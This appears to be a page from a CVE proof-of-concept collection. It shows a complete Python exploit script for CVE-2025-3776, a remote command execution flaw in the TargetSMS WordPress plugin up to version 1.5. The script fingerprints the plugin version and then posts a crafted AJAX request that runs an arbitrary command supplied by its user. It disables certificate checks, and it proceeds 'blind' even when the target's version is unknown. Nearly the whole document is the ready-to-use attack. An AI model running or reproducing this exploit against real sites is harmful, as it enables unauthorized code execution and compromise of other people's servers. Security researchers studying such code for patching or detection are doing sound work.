4837 Total CVEs
26 Years
GitHub
Home / 2025 / CVE-2025-3776
README.md
Rendering markdown...
POC / CVE-2025-3776.py PY
⬇ Raw GitHub ✕ Close 
import requests
import argparse
import re

# Exploit By: Nxploited ( Khaled Alenazi )

def disable_ssl_warnings():
    requests.packages.urllib3.disable_warnings()


def setup_user_agent():
    return "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"


def parse_arguments():
    parser = argparse.ArgumentParser(description='CVE-2025-3776 Exploit for TargetSMS Plugin <= 1.5 # Exploit by Nxploited ( Khaled Alenazi )')
    parser.add_argument("-u", "--url", required=True, help="Target WordPress site URL")
    parser.add_argument("-c", "--cmd", default="whoami", help="Command to execute (default: whoami)")
    return parser.parse_args()


def prepare_session(user_agent):
    session = requests.Session()
    session.verify = False
    session.headers.update({"User-Agent": user_agent})
    return session


def normalize_url(base_url):
    return base_url.rstrip("/")


def construct_readme_url(base_url):
    return f"{base_url}/wp-content/plugins/verification-sms-targetsms/readme.txt"


def construct_exploit_url(base_url, cmd):
    return f"{base_url}/wp-admin/admin-ajax.php?cmd={cmd}"


def construct_exploit_data():
    return {
        "action": "targetvrHHndler",
        "callback": "evil"
    }


def check_plugin_version(session, readme_url):
    try:
        response = session.get(readme_url, timeout=10)
        if response.status_code == 200:
            match = re.search(r"Stable tag:\s*([\d.]+)", response.text)
            if match:
                return float(match.group(1).strip())
        return None
    except requests.RequestException:
        return None


def is_plugin_vulnerable(version):
    return version is not None and version <= 1.5


def exploit(session, exploit_url, data):
    try:
        response = session.post(exploit_url, data=data, timeout=10)
        if "<pre>" in response.text:
            print("\n[+] Exploit succeeded!")
            print(response.text.strip())
            print("\nExploit By : Nxploited ( Khaled Alenazi )")
        elif "status" in response.text and "false" in response.text:
            print("[-] Exploit failed. Callback may not exist or plugin is patched.")
        else:
            print("[-] Unexpected response or server returned no valid output.")
    except requests.RequestException as e:
        print(f"[!] Error during exploitation: {e}")


def main():
    disable_ssl_warnings()
    user_agent = setup_user_agent()
    args = parse_arguments()

    session = prepare_session(user_agent)
    base_url = normalize_url(args.url)
    readme_url = construct_readme_url(base_url)
    exploit_url = construct_exploit_url(base_url, args.cmd)
    data = construct_exploit_data()

    print("[*] Checking plugin version...")
    version = check_plugin_version(session, readme_url)
    if version:
        print(f"[+] Plugin version detected: {version}")
        if is_plugin_vulnerable(version):
            print("[+] Plugin is vulnerable. Proceeding with exploitation...")
        else:
            print("[!] Plugin version > 1.5, may not be vulnerable. Attempting exploit anyway...")
    else:
        print("[!] Could not determine plugin version. Proceeding with blind exploitation...")

    print("[*] Sending exploit request...")
    exploit(session, exploit_url, data)


if __name__ == "__main__":
    main()